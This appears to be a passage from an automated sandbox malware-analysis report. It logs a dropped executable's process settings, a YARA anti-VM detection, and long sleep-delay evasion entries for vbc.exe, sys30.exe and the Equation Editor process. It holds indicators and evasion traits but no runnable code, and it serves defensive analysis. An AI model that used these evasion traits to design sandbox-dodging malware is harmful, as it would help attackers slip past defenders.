Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3Show sources
Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2224, type: MEMORYSTR
Source: Yara matchFile source: Process Memory Space: sys30.exe PID: 3048, type: MEMORYSTR
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2796Thread sleep time: -240000s >= -30000sJump to behavior
Source: C:\Users\Public\vbc.exe TID: 1944Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Users\Public\vbc.exe TID: 2804Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Users\Public\vbc.exe TID: 2280Thread sleep count: 193 > 30Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1944Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Users\Public\vbc.exe TID: 2556Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe TID: 2540Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe TID: 2688Thread sleep time: -15679732462653109s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe TID: 2904Thread sleep count: 8354 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe TID: 2904Thread sleep count: 1010 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe TID: 2608Thread sleep count: 36 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe TID: 2608Thread sleep time: -36000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe TID: 2816Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe TID: 2604Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe TID: 2572Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 1712Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 2120Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 1704Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 1408Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 2060Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 1312Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 2668Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 1016Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 3008Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 832Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 2928Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 604Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 2188Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 2792Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 2072Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 1304Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 1712Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 1452Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 1612Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 2224Thread sleep time: -60000s >= -30000s
Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeWindow / User API: threadDelayed 8354Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeWindow / User API: threadDelayed 1010Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeWindow / User API: threadDelayed 7559
